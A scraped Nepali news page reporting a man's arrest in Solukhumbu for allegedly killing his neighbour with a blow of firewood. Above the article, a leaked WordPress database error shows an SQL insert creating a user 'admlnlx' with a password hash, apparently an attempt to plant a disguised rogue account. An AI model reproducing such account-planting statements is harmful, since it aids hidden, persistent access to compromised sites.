WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmoXPOPaeVGqrK2ymBP3yyQb7O9muV/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:14:33', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुमा कुटपिट गरि छिमेकीको हत्या गरेको अरोपमा एक व्यक्तीलाई प्रहरीले पक्राउ गरेको छ । माप्य दुधकोशी गाउँपालिका १ बस्ने ४५ बर्षीय वाङदी शेर्पालाई छिमेकीको कुटपिट गरी हत्या गरेको आरोपमा पक्राउ गरेको हो ।
वाङदीले ५२ बर्षीय दानु शेर्पालाई गए राति करिब १२ बजे दाउराले टाउकोमा प्रहार गरि हत्या गरेको प्रारम्भिक अनुसन्धानबाट खुलेको छ । घटनाको जानकारी पाए लगतै प्रहरी चौकी खरिखोलाबाट प्रहरी टोली खटि गई वाङदी शेर्पालाई नियन्त्रणमा लिएको हो ।
घटना सम्बन्धमा थप अनुसन्धान भईरहेको प्रदेश नम्बर १ प्रहरीले जनाएको छ ।